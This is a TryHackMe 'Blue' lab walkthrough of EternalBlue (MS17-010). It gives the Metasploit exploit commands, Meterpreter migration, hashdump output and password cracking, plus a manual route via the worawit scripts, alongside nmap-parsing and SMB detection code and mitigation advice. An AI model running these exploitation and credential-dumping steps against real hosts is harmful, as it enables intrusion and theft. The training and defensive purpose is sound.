
THM: Blue Box – EternalBlue Exploitation

A walkthrough of the TryHackMe Blue room demonstrating the infamous EternalBlue (MS17-010) vulnerability exploitation.

Tags: TryHackMe, CTF, EternalBlue, Windows, Metasploit


The TryHackMe Blue room teaches one of the most impactful vulnerabilities in recent history: EternalBlue (MS17-010), the SMBv1 exploit behind the WannaCry ransomware outbreak that hit organizations worldwide in May 2017.

Room Information

  • Name: Blue
  • Platform: TryHackMe
  • Difficulty: Easy
  • Skills: Windows exploitation, Metasploit, post-exploitation

Background: What is EternalBlue?

EternalBlue exploits a vulnerability in Microsoft's SMBv1 implementation. It is widely attributed to the NSA and was published by the Shadow Brokers group in April 2017, a month after Microsoft had already shipped the fix as security bulletin MS17-010 (March 2017). WannaCry hit unpatched hosts two months after the patch was available, which is why this room is as much a lesson in patch management as in exploitation.

Impact

  • Used in WannaCry ransomware (May 2017)
  • Used in NotPetya attack (June 2017)
  • Billions of dollars in damages
  • Affected hospitals, shipping companies, governments

The Vulnerability

  • CVE-2017-0144 (MS17-010 fixes a family of SMBv1 bugs, CVE-2017-0143 through CVE-2017-0148; EternalBlue is the exploit for CVE-2017-0144)
  • Buffer overflow in srv.sys, the kernel-mode SMBv1 server driver, triggered while it converts extended-attribute (FEA) lists carried in transaction requests
  • Allows remote code execution in kernel context, which is why the exploit lands directly as SYSTEM
  • Pre-authentication: on Windows 7 an anonymous (null) session is enough, so no credentials are needed

Task 1: Recon

Deploy and Scan

nmap -sV -vv --script vuln 10.10.X.X

Key findings:

PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 SP1
3389/tcp  open  tcpwrapped
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers

The machine is vulnerable to MS17-010!
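As an added example (not part of the original walkthrough), the following Python parses the normal-format output of that scan for any number of hosts and pulls out the two facts Task 1 asks for: the open ports and whether smb-vuln-ms17-010 reported the host VULNERABLE. The scan text is constructed to mirror the output above, with made-up addresses; in practice you would feed it the saved output of an nmap -oN run against a whole range.

```python
"""Triage nmap output for MS17-010 across many hosts.

Added example, not part of the original walkthrough. Parses nmap's normal
(-oN / stdout) format from `nmap -sV --script vuln` and reports, per host,
the open TCP ports and whether smb-vuln-ms17-010 marked it VULNERABLE.
SAMPLE_SCAN is constructed for illustration; the addresses are made up.
"""
import re

SAMPLE_SCAN = """\
Nmap scan report for 10.10.0.5
Host is up (0.020s latency).
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 SP1
3389/tcp  open  tcpwrapped

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|_    IDs:  CVE:CVE-2017-0144

Nmap scan report for 10.10.0.6
Host is up (0.015s latency).
PORT      STATE SERVICE      VERSION
22/tcp    open  ssh          OpenSSH 8.2
445/tcp   open  microsoft-ds Samba smbd 4.6.2
9090/tcp  closed zeus-admin

Host script results:
|_smb-vuln-ms17-010: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)")


def parse_nmap(text):
    """Return {host: {"open_ports": [int, ...], "ms17_010": bool}}."""
    hosts = {}
    current = None
    in_script = False          # inside the smb-vuln-ms17-010 block for this host
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group(1)
            hosts[current] = {"open_ports": [], "ms17_010": False}
            in_script = False
            continue
        if current is None:
            continue
        m = PORT_RE.match(line)
        if m:
            if m.group(3) == "open":
                hosts[current]["open_ports"].append(int(m.group(1)))
            continue
        if line.startswith("|"):
            body = line.lstrip("|_ ")
            if body.startswith("smb-vuln-ms17-010"):
                in_script = True                      # script header line
            elif not line.startswith("|  "):
                in_script = False                     # some other script's header
            elif in_script and body.startswith("VULNERABLE:"):
                hosts[current]["ms17_010"] = True     # "VULNERABLE:" only appears for vulnerable state
            if line.startswith("|_"):
                in_script = False                     # "|_" closes a script block
        else:
            in_script = False
    return hosts


def ports_below(hosts, host, limit=1000):
    """Open ports on `host` numbered below `limit` (the room's first question)."""
    return sorted(p for p in hosts[host]["open_ports"] if p < limit)


def vulnerable_hosts(hosts):
    return sorted(h for h, v in hosts.items() if v["ms17_010"])


if __name__ == "__main__":
    results = parse_nmap(SAMPLE_SCAN)
    for host, info in results.items():
        print(host, "open:", info["open_ports"], "MS17-010:", info["ms17_010"])
    print("vulnerable:", vulnerable_hosts(results))
```

The parser keys off nmap's own conventions: "| name:" opens a script block, "|   " continues it, and "|_" closes it, so it will not be fooled by the word VULNERABLE appearing in another script's output.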

Task 2: Gain Access

Starting Metasploit

msfconsole

Finding the Exploit

search ms17-010

Select the EternalBlue exploit:

use exploit/windows/smb/ms17_010_eternalblue

Configuring the Exploit

show options
set RHOSTS 10.10.X.X
set LHOST tun0

Exploitation

exploit

If successful, you'll receive a Meterpreter session:

[*] Meterpreter session 1 opened
meterpreter >

Task 3: Escalate

Checking Privileges

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

We're already SYSTEM. No privilege escalation step is needed: the bug lives in the kernel driver srv.sys, so the payload runs in kernel mode and the module injects the Meterpreter stage into an existing SYSTEM process. Task 3 is therefore about keeping that access stable rather than elevating it.

Migrating Process

The initial session lives in whichever SYSTEM process the kernel shellcode injected into. Move it into a long-lived 64-bit SYSTEM process so the session survives if that host process exits. List candidates with:

meterpreter > ps

Pick a process such as spoolsv.exe (64-bit, running as NT AUTHORITY\SYSTEM) and note its PID. Avoid lsass.exe: destabilizing it reboots the box and ends the session.

meterpreter > migrate [PID]

Task 4: Cracking

Dumping Credentials

meterpreter > hashdump

Output:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

Cracking with John

Each hashdump line is user:RID:LM hash:NT hash. aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty string (LM storage is off on Windows 7), and 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password, so there is nothing to crack for Administrator or Guest and only Jon matters. The NT hash is unsalted MD4 over the UTF-16LE password, which is why a wordlist attack is fast. Save Jon's NT hash and crack it:

echo "ffb43f0de35be4d9917ac0cc8ad57f8d" > hash.txt
john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Cracked: alqfna22

Task 5: Find Flags

Flag 1 - System Root

meterpreter > search -f flag1.txt
meterpreter > cat C:/flag1.txt

Flag 2 - Administrator Location

meterpreter > cat "C:/Windows/System32/config/flag2.txt"

Flag 3 - Excellent Location

Where would excellent administrators store documents?

meterpreter > cat "C:/Users/Jon/Documents/flag3.txt"

Alternative: Manual Exploitation

For learning purposes, you can also exploit MS17-010 without Metasploit:

Using worawit's Impacket-based scripts

The worawit/MS17-010 repository contains Python exploits built on Impacket's SMB library. zzz_exploit.py does not use the EternalBlue buffer overflow at all; it abuses the same family of SMBv1 transaction bugs through a named pipe, the EternalRomance/EternalSynergy approach, which the repository describes as more reliable than its EternalBlue ports. The scripts were written for Python 2 with Impacket installed:

git clone https://github.com/worawit/MS17-010.git
cd MS17-010
python2 zzz_exploit.py 10.10.X.X

Out of the box the script only proves code execution (it creates a file on the target's C: drive and reports success); edit its smb_pwn() function to run your own command or drop a payload. If its automatic pipe discovery fails, pass a named pipe name as the second argument.

Using Standalone Exploits

Other researchers have published stand-alone EternalBlue exploits that speak SMB directly and generate their own kernel shellcode, such as the AutoBlue-MS17-010 scripts. They are useful for seeing each stage that the Metasploit module hides behind a single exploit command: the SMBv1 negotiate and null session, the oversized transaction request, the buffer grooming, and the shellcode delivery.

Post-Exploitation Notes

What SYSTEM Access Means

With SYSTEM privileges, you can:

  • Read any file on the system
  • Dump all credential hashes
  • Install persistence
  • Pivot to other systems
  • Read data on unlocked volumes, including a BitLocker-protected system drive while Windows is running (EFS-protected user files still require that user's keys)

Real-World Impact

In a corporate environment, this single vulnerability could:

  • Compromise the entire domain
  • Access sensitive business data
  • Deploy ransomware
  • Establish persistent access

Defense & Mitigation

Immediate Actions

  1. Apply the MS17-010 update (in May 2017 Microsoft also shipped out-of-band patches for the then-unsupported XP and Server 2003)
  2. Disable SMBv1 on every host (Windows 10 1709 and later no longer install it by default)
  3. Block TCP 445 (and 139) at the perimeter, and between workstations internally
  4. Segment networks so one compromised host cannot reach every SMB server

Detection

  • Alert on SMBv1 sessions that continue past Negotiate; SMB2/3 clients still open with an SMBv1-format Negotiate, so only traffic beyond that step shows SMBv1 is actually in use
  • Deploy IDS signatures for the exploit's transaction sequence (an oversized NT Trans request followed by Trans2 Secondary requests)
  • Watch the endpoints: lsass.exe or spoolsv.exe spawning cmd.exe or powershell.exe, unexpected injection into SYSTEM processes, and SAM or hashdump-style credential access
  • Baseline east-west SMB traffic so a host suddenly connecting to port 445 on many peers (the WannaCry worming pattern) stands out
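As an added example that is not from the original walkthrough, the following Python turns the first two network checks above into code. It parses the NetBIOS session framing and the SMB1/SMB2 headers of port 445 traffic and raises per-connection alerts for an SMBv1 session that continues past Negotiate (an SMB2/3 client still opens with an SMBv1-format Negotiate, so that packet alone proves nothing) and for an NT Trans request followed by Trans2 Secondary requests, the sequence public analyses of EternalBlue describe. The second check is a heuristic, not a full signature. The frames and addresses are constructed; in practice they would come from a pcap or a sensor.

```python
"""Flag SMBv1 use and the EternalBlue transaction pattern in SMB frames.

Added example, not part of the original walkthrough. Parses the NetBIOS
Session Service header and the SMB1/SMB2 headers of TCP/445 frames and raises
two per-connection alerts: an SMBv1 command after Negotiate (SMB2 clients still
send an SMBv1-format Negotiate first, so Negotiate alone is not a signal), and
an NT Trans request followed by Trans2 Secondary requests, the sequence public
analyses of EternalBlue describe (heuristic). SAMPLE_FRAMES is constructed.
"""
import struct

SMB_COM_TRANSACTION2_SECONDARY = 0x33
SMB_COM_NEGOTIATE = 0x72
SMB_COM_SESSION_SETUP_ANDX = 0x73
SMB_COM_TREE_CONNECT_ANDX = 0x75
SMB_COM_NT_TRANSACT = 0xA0
SMB2_NEGOTIATE = 0x0000
SMB2_SESSION_SETUP = 0x0001


def parse_frame(data: bytes):
    """Return (version, command) for one NetBIOS session message, else None."""
    if len(data) < 4 or data[0] != 0x00:            # 0x00 = session message
        return None
    length = int.from_bytes(data[1:4], "big")
    body = data[4:4 + length]
    if body[:4] == b"\xffSMB" and len(body) >= 32:   # SMB1: 1-byte command at offset 4
        return 1, body[4]
    if body[:4] == b"\xfeSMB" and len(body) >= 64:   # SMB2: 2-byte command at offset 12
        return 2, struct.unpack_from("<H", body, 12)[0]
    return None


class SmbMonitor:
    """Stateful per-connection detector; call feed() with frames in wire order."""

    def __init__(self):
        self.prev = {}       # conn -> last SMB1 command seen on that connection
        self.alerts = []     # (conn, message), deduplicated per connection
        self._seen = set()

    def _alert(self, conn, msg):
        if (conn, msg) not in self._seen:
            self._seen.add((conn, msg))
            self.alerts.append((conn, msg))

    def feed(self, conn, frame: bytes):
        parsed = parse_frame(frame)
        if parsed is None:
            return
        version, cmd = parsed
        if version == 2:                 # connection upgraded to SMB2/3: nothing to flag
            self.prev.pop(conn, None)
            return
        if cmd != SMB_COM_NEGOTIATE:
            self._alert(conn, "SMBv1 session in use")
        if self.prev.get(conn) == SMB_COM_NT_TRANSACT and cmd == SMB_COM_TRANSACTION2_SECONDARY:
            self._alert(conn, "NT Trans followed by Trans2 Secondary: possible MS17-010/EternalBlue")
        self.prev[conn] = cmd


def smb1_frame(command: int, payload: bytes = b"") -> bytes:
    """Constructed SMB1 message: 32-byte header with other fields zeroed."""
    body = b"\xffSMB" + bytes([command]) + b"\x00" * 27 + payload
    return b"\x00" + len(body).to_bytes(3, "big") + body


def smb2_frame(command: int) -> bytes:
    """Constructed SMB2 message: 64-byte header, Command at offset 12."""
    body = b"\xfeSMB" + struct.pack("<HHIH", 64, 0, 0, command) + b"\x00" * 50
    return b"\x00" + len(body).to_bytes(3, "big") + body


LEGIT = ("10.10.0.20:50112", "10.10.0.5:445")    # constructed
ATTACK = ("10.10.0.99:41000", "10.10.0.5:445")   # constructed
SAMPLE_FRAMES = [
    (LEGIT, smb1_frame(SMB_COM_NEGOTIATE)),        # multi-protocol negotiate, SMB1 format
    (LEGIT, smb2_frame(SMB2_NEGOTIATE)),
    (LEGIT, smb2_frame(SMB2_SESSION_SETUP)),
    (ATTACK, smb1_frame(SMB_COM_NEGOTIATE)),
    (ATTACK, smb1_frame(SMB_COM_SESSION_SETUP_ANDX)),
    (ATTACK, smb1_frame(SMB_COM_TREE_CONNECT_ANDX)),
    (ATTACK, smb1_frame(SMB_COM_NT_TRANSACT, b"\x00" * 64)),
    (ATTACK, smb1_frame(SMB_COM_TRANSACTION2_SECONDARY, b"\x00" * 64)),
    (ATTACK, smb1_frame(SMB_COM_TRANSACTION2_SECONDARY, b"\x00" * 64)),
]


def run(frames):
    mon = SmbMonitor()
    for conn, frame in frames:
        mon.feed(conn, frame)
    return mon.alerts


if __name__ == "__main__":
    for conn, msg in run(SAMPLE_FRAMES):
        print(conn[0], "->", conn[1], ":", msg)
```

The first alert is the one worth acting on after SMBv1 has been disabled fleet-wide: any connection that keeps speaking SMBv1 past Negotiate means a server still accepts it. The transaction-sequence check should be treated as a lead for packet-level inspection rather than proof of exploitation.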

Verification

Check the server side on each host; which command applies depends on the Windows version:

# Windows 10 / 11 and Server 2016+: optional-feature state (State : Enabled means SMBv1 is installed)
Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
# Windows 7 / Server 2008 R2 (no optional feature): registry value 0 = disabled, value absent = enabled
Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name SMB1 -ErrorAction SilentlyContinue

Questions & Answers

  1. How many ports are open under 1000? 3 (135, 139 and 445; 3389 is above 1000)
  2. What is this machine vulnerable to? ms17-010
  3. What is the name of the non-default user? Jon
  4. What is Jon's password? alqfna22

Key Takeaways

Technical

  • EternalBlue is devastatingly effective
  • Metasploit makes exploitation straightforward
  • Post-exploitation is crucial for impact

Strategic

  • Patch management is critical
  • Legacy protocols create risk
  • Network segmentation limits damage

Tools Used

  • nmap
  • Metasploit Framework
  • John the Ripper
  • Meterpreter

Want to learn more about Windows exploitation? Contact us: m1k3@msquarellc.net
